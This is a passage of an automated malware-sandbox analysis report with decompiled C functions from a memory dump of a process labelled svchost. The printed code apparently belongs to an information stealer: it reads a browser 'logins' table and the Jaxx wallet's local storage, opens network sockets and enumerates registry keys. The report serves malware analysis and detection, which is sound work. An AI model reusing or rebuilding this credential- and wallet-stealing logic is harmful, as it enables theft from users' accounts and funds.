					_pop(_t25);
				} else {
					_t22 = 0;
				}
				return E0BC09FDC(_t22, _t25, _v8 ^ _t34, _t30, _t31, _t32);
			}

















                                                                                                                                        0x0bc08a86
                                                                                                                                        0x0bc08a86
                                                                                                                                        0x0bc08a86
                                                                                                                                        0x0bc08a8e
                                                                                                                                        0x0bc08a93
                                                                                                                                        0x0bc08a9a
                                                                                                                                        0x0bc08aa2
                                                                                                                                        0x0bc08ab1
                                                                                                                                        0x0bc08ab3
                                                                                                                                        0x0bc08ab9
                                                                                                                                        0x0bc08ac2
                                                                                                                                        0x0bc08ad4
                                                                                                                                        0x0bc08ad5
                                                                                                                                        0x0bc08aef
                                                                                                                                        0x0bc08af7
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc08b05
                                                                                                                                        0x0bc08b0a
                                                                                                                                        0x0bc08b11
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc08b13
                                                                                                                                        0x0bc08b15
                                                                                                                                        0x0bc08b15
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc08b11
                                                                                                                                        0x0bc08b1c
                                                                                                                                        0x0bc08b22
                                                                                                                                        0x0bc08b24
                                                                                                                                        0x0bc08ac4
                                                                                                                                        0x0bc08ac4
                                                                                                                                        0x0bc08ac4
                                                                                                                                        0x0bc08ad3

                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNELBASE(0BC09A62,80000000,00000003,00000000,00000003,00000000,00000000,HWID,?,?,0BC09A62,00000000,?,?,?), ref: 0BC08AB3
                                                                                                                                        • ReadFile.KERNELBASE(?,?,00001000,?,00000000,?,?,0BC09A62,00000000,?,?,?), ref: 0BC08AEF
                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,0BC09A62,00000000,?,?,?), ref: 0BC08B1C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$ChangeCloseCreateFindNotificationRead
                                                                                                                                        • String ID: HWID
                                                                                                                                        • API String ID: 2525391649-1176364606
                                                                                                                                        • Opcode ID: ffafe5a687582719cb426d39b0ed1fcaef73a5488097d6f5f58cf20c3c4ace70
                                                                                                                                        • Instruction ID: 121c2fdac6a150c252802556d22affc377e9ed2cefd4704d58926315f4f9fcbc
                                                                                                                                        • Opcode Fuzzy Hash: ffafe5a687582719cb426d39b0ed1fcaef73a5488097d6f5f58cf20c3c4ace70
                                                                                                                                        • Instruction Fuzzy Hash: 4D116535A21168EFDB219A65DC44BDB7BACEB09766F008295B549E2180CA709FC4DBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC02B55, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 87stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                        			E0BC02B55(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20) {
				CHAR* _v8;
				char _v12;
				char _v16;
				char _v20;
				void* __esi;
				int _t26;
				void* _t27;
				void* _t28;
				void* _t31;
				void* _t34;
				intOrPtr _t35;
				signed int _t50;
				signed int _t51;

				if(_a16 == 5) {
					_t35 = _a12;
					_push(_t35);
					_t50 =  &_v8;
					_t27 = 2;
					_t26 = E0BC0326D(_t27,  &_v12,  &_a16, _t50);
					if(_a16 == 1) {
						_t26 = lstrcmpiA(_v8, "logins");
						if(_t26 == 0) {
							_t26 = E0BC0326D(_t26,  &_v12,  &_a16, _t50, _t35);
							if(_a16 == 1) {
								_t26 = lstrcmpA("table", _v8);
								if(_t26 == 0) {
									_push(_t35);
									_t28 = 3;
									_t26 = E0BC0326D(_t28,  &_v12,  &_a16, _t50);
									if(_a16 == 0) {
										_push(_t35);
										_v20 =  *_v8;
										_t31 = 4;
										_t26 = E0BC0326D(_t31,  &_v12,  &_a16, _t50);
										if(_a16 == 1) {
											_t51 = _t50 | 0xffffffff;
											 *0xbc10d60 = _t51;
											 *0xbc10d40 = _t51;
											 *0xbc10d18 = _t51;
											_t26 = E0BC03786(_v8, E0BC02C5D);
											_v16 = 1;
											if( *0xbc10d60 != _t51 &&  *0xbc10d40 != _t51 &&  *0xbc10d18 != _t51) {
												_t34 = E0BC0341E(_a4, _a8, _v20,  &_v16, _a20, E0BC02D22); // executed
												return _t34;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t26;
			}
















                                                                                                                                        0x0bc02b62
                                                                                                                                        0x0bc02b68
                                                                                                                                        0x0bc02b6b
                                                                                                                                        0x0bc02b6e
                                                                                                                                        0x0bc02b77
                                                                                                                                        0x0bc02b78
                                                                                                                                        0x0bc02b84
                                                                                                                                        0x0bc02b92
                                                                                                                                        0x0bc02b9a
                                                                                                                                        0x0bc02ba7
                                                                                                                                        0x0bc02bb0
                                                                                                                                        0x0bc02bbe
                                                                                                                                        0x0bc02bc6
                                                                                                                                        0x0bc02bcc
                                                                                                                                        0x0bc02bd5
                                                                                                                                        0x0bc02bd6
                                                                                                                                        0x0bc02be0
                                                                                                                                        0x0bc02be8
                                                                                                                                        0x0bc02be9
                                                                                                                                        0x0bc02bf1
                                                                                                                                        0x0bc02bf2
                                                                                                                                        0x0bc02bfb
                                                                                                                                        0x0bc02c00
                                                                                                                                        0x0bc02c08
                                                                                                                                        0x0bc02c0e
                                                                                                                                        0x0bc02c14
                                                                                                                                        0x0bc02c1a
                                                                                                                                        0x0bc02c20
                                                                                                                                        0x0bc02c29
                                                                                                                                        0x0bc02c50
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02c55
                                                                                                                                        0x0bc02c29
                                                                                                                                        0x0bc02bfb
                                                                                                                                        0x0bc02be0
                                                                                                                                        0x0bc02bc6
                                                                                                                                        0x0bc02bb0
                                                                                                                                        0x0bc02b9a
                                                                                                                                        0x0bc02b84
                                                                                                                                        0x0bc02c5c

                                                                                                                                        APIs
                                                                                                                                        • lstrcmpiA.KERNEL32(?,logins), ref: 0BC02B92
                                                                                                                                        • lstrcmpA.KERNEL32(table,?), ref: 0BC02BBE
                                                                                                                                          • Part of subcall function 0BC03786: StrStrIA.SHLWAPI(?,0BC0DA88,00000001,?,?,0BC02C1F,0BC02C5D), ref: 0BC03795
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmplstrcmpi
                                                                                                                                        • String ID: logins$table
                                                                                                                                        • API String ID: 3524194181-3800951466
                                                                                                                                        • Opcode ID: 41af7e2380f9ca63be5def90e1dc9fe6cdc849ecfcf07adbf1c52c8d17fe5dbd
                                                                                                                                        • Instruction ID: 8f81f5f5e63b02197163b2c7a698a640f0b45a10ff1408de43dc29921fbbfff5
                                                                                                                                        • Opcode Fuzzy Hash: 41af7e2380f9ca63be5def90e1dc9fe6cdc849ecfcf07adbf1c52c8d17fe5dbd
                                                                                                                                        • Instruction Fuzzy Hash: 9E31B131A3126EEFDF11DF90D949AAE3BB8FB45615F100616F510AA080EB30DBC6CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Function 0BC017C5, Relevance: 6.1, APIs: 4, Instructions: 52networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 18%
                                                                                                                                        			E0BC017C5(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				short _v26;
				char _v28;
				void* __edi;
				signed int _t9;
				signed int _t10;
				short _t13;
				intOrPtr _t14;
				signed int _t15;
				char* _t17;
				intOrPtr _t18;
				intOrPtr _t22;
				signed int _t23;
				signed int _t25;

				_t24 = __esi;
				_t22 = __edx;
				_t18 = __ebx;
				_t9 =  *0xbc10000; // 0xbb40e64e
				_t10 = _t9 ^ _t25;
				_v12 = _t10;
				__imp__#23(2, 1, 6); // executed
				_t23 = _t10;
				if(_t23 != 0xffffffff) {
					E0BC08D5E( &_v28,  &_v28, 0, 0x10);
					_t13 = 2;
					_v28 = _t13;
					__imp__#9(_a4);
					_v26 = _t13;
					if(__esi != 0) {
						_t14 = E0BC01798(_t13, __esi); // executed
						if(_t14 == 0xffffffff) {
							goto L3;
						} else {
							_v24 = _t14;
							_t17 =  &_v28;
							__imp__#4(_t23, _t17, 0x10); // executed
							if(_t17 == 0xffffffff) {
								goto L3;
							} else {
								_t15 = _t23;
							}
						}
					} else {
						L3:
						__imp__#3(_t23);
						goto L1;
					}
				} else {
					L1:
					_t15 = 0;
				}
				return E0BC09FDC(_t15, _t18, _v12 ^ _t25, _t22, _t23, _t24);
			}


















                                                                                                                                        0x0bc017c5
                                                                                                                                        0x0bc017c5
                                                                                                                                        0x0bc017c5
                                                                                                                                        0x0bc017cb
                                                                                                                                        0x0bc017d0
                                                                                                                                        0x0bc017d2
                                                                                                                                        0x0bc017dc
                                                                                                                                        0x0bc017e2
                                                                                                                                        0x0bc017e7
                                                                                                                                        0x0bc017f5
                                                                                                                                        0x0bc017fc
                                                                                                                                        0x0bc01800
                                                                                                                                        0x0bc01804
                                                                                                                                        0x0bc0180a
                                                                                                                                        0x0bc01810
                                                                                                                                        0x0bc0181c
                                                                                                                                        0x0bc01825
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01827
                                                                                                                                        0x0bc01827
                                                                                                                                        0x0bc0182c
                                                                                                                                        0x0bc01831
                                                                                                                                        0x0bc0183a
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0183c
                                                                                                                                        0x0bc0183c
                                                                                                                                        0x0bc0183c
                                                                                                                                        0x0bc0183a
                                                                                                                                        0x0bc01812
                                                                                                                                        0x0bc01812
                                                                                                                                        0x0bc01813
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01813
                                                                                                                                        0x0bc017e9
                                                                                                                                        0x0bc017e9
                                                                                                                                        0x0bc017e9
                                                                                                                                        0x0bc017e9
                                                                                                                                        0x0bc0184a

                                                                                                                                        APIs
                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 0BC017DC
                                                                                                                                        • htons.WS2_32(0BC01D23), ref: 0BC01804
                                                                                                                                        • closesocket.WS2_32(00000000), ref: 0BC01813
                                                                                                                                          • Part of subcall function 0BC01798: inet_addr.WS2_32(0BC01821), ref: 0BC0179F
                                                                                                                                          • Part of subcall function 0BC01798: gethostbyname.WS2_32(0BC01821), ref: 0BC017AF
                                                                                                                                        • connect.WS2_32(00000000,?,00000010), ref: 0BC01831
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: closesocketconnectgethostbynamehtonsinet_addrsocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1954806591-0
                                                                                                                                        • Opcode ID: ffdfba3bf88c5b5ba290a8a0cc217c54cbdd62684d082f32aa98eeb64857df88
                                                                                                                                        • Instruction ID: 344f523d1d4f76ace95324904cf47fcafc91db9bd411caa6d6598323bb858b51
                                                                                                                                        • Opcode Fuzzy Hash: ffdfba3bf88c5b5ba290a8a0cc217c54cbdd62684d082f32aa98eeb64857df88
                                                                                                                                        • Instruction Fuzzy Hash: 4901D231A302086ADB109BB8888ABBEB7F9EF05B20F150715F611F61D0DF70864192A1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.56%

                                                                                                                                        Function 0BC01067, Relevance: 6.0, APIs: 4, Instructions: 30commemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 65%
                                                                                                                                        			_entry_() {
				long _v8;
				CHAR* _t5;
				int _t6;
				void* _t11;
				signed char _t14;

				_push(_t11);
				_push(_t11);
				E0BC09DF5(E0BC01036(_t11));
				_t5 = LocalAlloc(0x40, 0x181);
				_t13 =  &_v8;
				 *0xbc10d04 = _t5;
				_v8 = 0x101;
				_t6 = GetUserNameA(_t5,  &_v8); // executed
				if(_t6 == 0) {
					E0BC08D3D( *0xbc10d04);
					 *0xbc10d04 =  *0xbc10d04 & 0x00000000;
					_pop(_t13);
				}
				__imp__OleInitialize(0); // executed
				E0BC01153(_t14); // executed
				E0BC01507(_t13); // executed
				E0BC015D2(_t14); // executed
				ExitProcess(0);
			}








                                                                                                                                        0x0bc0106d
                                                                                                                                        0x0bc0106e
                                                                                                                                        0x0bc01076
                                                                                                                                        0x0bc01082
                                                                                                                                        0x0bc01088
                                                                                                                                        0x0bc0108e
                                                                                                                                        0x0bc01093
                                                                                                                                        0x0bc0109b
                                                                                                                                        0x0bc010a3
                                                                                                                                        0x0bc010ab
                                                                                                                                        0x0bc010b0
                                                                                                                                        0x0bc010b7
                                                                                                                                        0x0bc010b7
                                                                                                                                        0x0bc010ba
                                                                                                                                        0x0bc010c0
                                                                                                                                        0x0bc010c5
                                                                                                                                        0x0bc010ca
                                                                                                                                        0x0bc010d1

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000181), ref: 0BC01082
                                                                                                                                        • GetUserNameA.ADVAPI32(00000000,?), ref: 0BC0109B
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 0BC010BA
                                                                                                                                        • ExitProcess.KERNEL32 ref: 0BC010D1
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Local$AllocExitFreeInitializeNameProcessUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4119324191-0
                                                                                                                                        • Opcode ID: 778d881cffe7395aefc21f6849b03d8c42a1b9f3d5e57e483ea3e64c660b8216
                                                                                                                                        • Instruction ID: bc3b3340f427298fe5baa1831b7b4d4f28dc7bd91b467def9c3d17e7b383ff92
                                                                                                                                        • Opcode Fuzzy Hash: 778d881cffe7395aefc21f6849b03d8c42a1b9f3d5e57e483ea3e64c660b8216
                                                                                                                                        • Instruction Fuzzy Hash: DEF05EB0574201AFE7147B70D90FB1A76D8EB10746F008718B15AE50D0EEB4EA409B22
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.85%

                                                                                                                                        Function 0BC01885, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32UNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 19%
                                                                                                                                        			E0BC01885(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v264;
				char _v268;
				signed int _v272;
				char _v276;
				signed int _t11;
				char* _t15;
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_t11 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t11 ^ _t25;
				_v272 = _v272 & 0x00000000;
				_v264 = _a4;
				_t15 =  &_v268;
				_v276 = 0x5a;
				_v268 = 1;
				__imp__#18(0, _t15, 0, 0,  &_v276); // executed
				if(_t15 == 0xffffffff || _t15 == 0) {
					_t16 = 0;
				} else {
					_t16 = 1;
				}
				return E0BC09FDC(_t16, _t19, _v8 ^ _t25, _t22, _t23, _t24);
			}
















                                                                                                                                        0x0bc0188e
                                                                                                                                        0x0bc01895
                                                                                                                                        0x0bc0189b
                                                                                                                                        0x0bc018a2
                                                                                                                                        0x0bc018b3
                                                                                                                                        0x0bc018bc
                                                                                                                                        0x0bc018c6
                                                                                                                                        0x0bc018d0
                                                                                                                                        0x0bc018d9
                                                                                                                                        0x0bc018e4
                                                                                                                                        0x0bc018df
                                                                                                                                        0x0bc018e1
                                                                                                                                        0x0bc018e1
                                                                                                                                        0x0bc018f1

                                                                                                                                        APIs
                                                                                                                                        • select.WS2_32(00000000,?,00000000,00000000,?), ref: 0BC018D0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: select
                                                                                                                                        • String ID: Z$]Kt
                                                                                                                                        • API String ID: 1274211008-539628341
                                                                                                                                        • Opcode ID: 1a0b0d4fa91d42d7acb8179a5213cc545adebc2a035f0589f8c062d57daeeb7e
                                                                                                                                        • Instruction ID: 3afb71f11a0221df52b87efa70a662904cddf7183cc76bf3a21d9d6a405cbe22
                                                                                                                                        • Opcode Fuzzy Hash: 1a0b0d4fa91d42d7acb8179a5213cc545adebc2a035f0589f8c062d57daeeb7e
                                                                                                                                        • Instruction Fuzzy Hash: CBF01D70A2420C9FDB50DB64CC567EAB7F8EB08304F5046A5A559EA1C0DBF0DBC48F90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC05C29, Relevance: 4.6, APIs: 3, Instructions: 74registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0BC05C61
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC05D0B
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0BC05D17
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1332880857-0
                                                                                                                                        • Opcode ID: a4c5db39df2dfce03e72550a84ae6030237c2437c195f1507d5f699066b272e7
                                                                                                                                        • Instruction ID: dedb7f613e48a566e3166646510a8231b438c7e33faa08f70d70f8e97880a810
                                                                                                                                        • Opcode Fuzzy Hash: a4c5db39df2dfce03e72550a84ae6030237c2437c195f1507d5f699066b272e7
                                                                                                                                        • Instruction Fuzzy Hash: FF21C9B5821128AFCB609F65CC45ADABBFDFF18254F00C1A5A989A2140DE719A85DFE0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.03%

                                                                                                                                        Function 0BC05B39, Relevance: 4.6, APIs: 3, Instructions: 70registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0BC05B6B
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC05C09
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0BC05C15
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1332880857-0
                                                                                                                                        • Opcode ID: c00f85125e5af1df12ae8fa792ed72c19d419f2ef3c08b9e805bc8ce804e5886
                                                                                                                                        • Instruction ID: 45a965a2435c344ea862d1ee773acff83e8127cee072e81897b45b25f7910f6b
                                                                                                                                        • Opcode Fuzzy Hash: c00f85125e5af1df12ae8fa792ed72c19d419f2ef3c08b9e805bc8ce804e5886
                                                                                                                                        • Instruction Fuzzy Hash: C321E6B582112CAFCB609B65CC45EDABBFCFF09254F00C1A5A989A2140DE709B85CFE0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.03%

                                                                                                                                        Function 0BC07461, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                        			E0BC07461(void* __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* __ebx;
				CHAR* _t10;
				CHAR* _t11;
				void* _t13;
				intOrPtr* _t14;
				void* _t19;
				CHAR* _t33;
				void* _t34;
				void* _t36;
				char** _t39;

				_t34 = E0BC08C9C(_a4, __edx, __eflags, 0x87);
				_t10 = E0BC091BE(0x1a);
				 *_t39 = "\\Jaxx\\Local Storage\\file__0.localstorage";
				_t11 = E0BC08F32(_t10, _t33);
				__imp__CreateStreamOnHGlobal(0, 1,  &_v8, _t36, _t19, __ecx, __ecx);
				_t13 = E0BC08A86(_t11, _v8, __edx, _t11); // executed
				_t42 = _t13;
				if(_t13 != 0) {
					E0BC037E4(_v8, _t42, _a4, 0x87, E0BC074DE);
				}
				_t14 = _v8;
				_t43 = _t14;
				if(_t14 != 0) {
					 *((intOrPtr*)( *_t14 + 8))(_t14);
				}
				return E0BC08D0C(_a4, _t34, _t43);
			}














                                                                                                                                        0x0bc0747a
                                                                                                                                        0x0bc0747c
                                                                                                                                        0x0bc07481
                                                                                                                                        0x0bc07489
                                                                                                                                        0x0bc0749a
                                                                                                                                        0x0bc074a4
                                                                                                                                        0x0bc074aa
                                                                                                                                        0x0bc074ac
                                                                                                                                        0x0bc074ba
                                                                                                                                        0x0bc074bf
                                                                                                                                        0x0bc074c2
                                                                                                                                        0x0bc074c5
                                                                                                                                        0x0bc074c7
                                                                                                                                        0x0bc074cc
                                                                                                                                        0x0bc074cc
                                                                                                                                        0x0bc074dd

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC091BE: LocalAlloc.KERNEL32(00000040,00000185,?,?,0BC02182,?), ref: 0BC091C9
                                                                                                                                          • Part of subcall function 0BC091BE: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,00000000,?,?,0BC02182,?), ref: 0BC091DA
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,HWID,?,?,?,0BC09A43), ref: 0BC08F58
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,?,0BC09A43), ref: 0BC08F5F
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcpyA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F70
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcatA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F7A
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0BC0749A
                                                                                                                                          • Part of subcall function 0BC08A86: CreateFileA.KERNELBASE(0BC09A62,80000000,00000003,00000000,00000003,00000000,00000000,HWID,?,?,0BC09A62,00000000,?,?,?), ref: 0BC08AB3
                                                                                                                                        Strings
                                                                                                                                        • \Jaxx\Local Storage\file__0.localstorage, xrefs: 0BC07481
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Createlstrlen$AllocFileFolderGlobalLocalPathStreamlstrcatlstrcpy
                                                                                                                                        • String ID: \Jaxx\Local Storage\file__0.localstorage
                                                                                                                                        • API String ID: 950119092-2567200104
                                                                                                                                        • Opcode ID: 38081a9845efc7ff1652c2b71023166ed78a2f3b6b2d658acbbc86707415c792
                                                                                                                                        • Instruction ID: c13a238ed48ba969a5cfdcd6914db5922f313371661c224895a0cb760a316ab5
                                                                                                                                        • Opcode Fuzzy Hash: 38081a9845efc7ff1652c2b71023166ed78a2f3b6b2d658acbbc86707415c792
                                                                                                                                        • Instruction Fuzzy Hash: E1018472734204BFDB04ABA4DC46E9E77ADDF45250F104466F649DB2C0DEB1DE419BA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.44%

                                                                                                                                        Function 0BC090FC, Relevance: 3.0, APIs: 2, Instructions: 22fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC090FC(CHAR* __ecx) {
				void* _t3;

				if(__ecx == 0 ||  *__ecx == 0) {
					L4:
					return 0;
				} else {
					_t3 = CreateFileA(__ecx, 0x80, 0, 0, 3, 0, 0); // executed
					if(_t3 == 0xffffffff) {
						goto L4;
					} else {
						FindCloseChangeNotification(_t3); // executed
						return 1;
					}
				}
			}




                                                                                                                                        0x0bc09100
                                                                                                                                        0x0bc09128
                                                                                                                                        0x0bc0912a
                                                                                                                                        0x0bc09106
                                                                                                                                        0x0bc09112
                                                                                                                                        0x0bc0911b
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0911d
                                                                                                                                        0x0bc0911e
                                                                                                                                        0x0bc09127
                                                                                                                                        0x0bc09127
                                                                                                                                        0x0bc0911b

                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,0BC01F1F), ref: 0BC09112
                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0BC0911E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ChangeCloseCreateFileFindNotification
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 727422849-0
                                                                                                                                        • Opcode ID: 1f0089d432ea22d22b694493d193c6492a1c2f376e6f155a931b27977b0fffcf
                                                                                                                                        • Instruction ID: be46d12d86aa0b3af3d0eac1b2e4ea5707d85783ba6e43fecb6d9b26e758913e
                                                                                                                                        • Opcode Fuzzy Hash: 1f0089d432ea22d22b694493d193c6492a1c2f376e6f155a931b27977b0fffcf
                                                                                                                                        • Instruction Fuzzy Hash: E6D05EE077220039EB2426341C0CB3725ECCB09216F140B90B661D40C1EE74CA518121
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

                                                                                                                                        Function 0BC01798, Relevance: 3.0, APIs: 2, Instructions: 19networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • inet_addr.WS2_32(0BC01821), ref: 0BC0179F
                                                                                                                                        • gethostbyname.WS2_32(0BC01821), ref: 0BC017AF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: gethostbynameinet_addr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1594361348-0
                                                                                                                                        • Opcode ID: f93ca0b0376ac6d2d96a663fc1f46df947d991395a12c709061ba8d57d35e7f6
                                                                                                                                        • Instruction ID: 1681dc22adfc4604a1ad3c3c11b56c577045b6fd622b0b397b2f888fa1b316f6
                                                                                                                                        • Opcode Fuzzy Hash: f93ca0b0376ac6d2d96a663fc1f46df947d991395a12c709061ba8d57d35e7f6
                                                                                                                                        • Instruction Fuzzy Hash: 47E012396211249FDB105F69D848986BBE8EF097F17064260FE19EB3B0C731ED109BC0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        Function 0BC091BE, Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                        			E0BC091BE(intOrPtr _a4) {
				void* _t5;

				_t5 = LocalAlloc(0x40, 0x185);
				__imp__SHGetFolderPathA(0, _a4, 0, 0, _t5); // executed
				return _t5;
			}




                                                                                                                                        0x0bc091cf
                                                                                                                                        0x0bc091da
                                                                                                                                        0x0bc091e4

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000185,?,?,0BC02182,?), ref: 0BC091C9
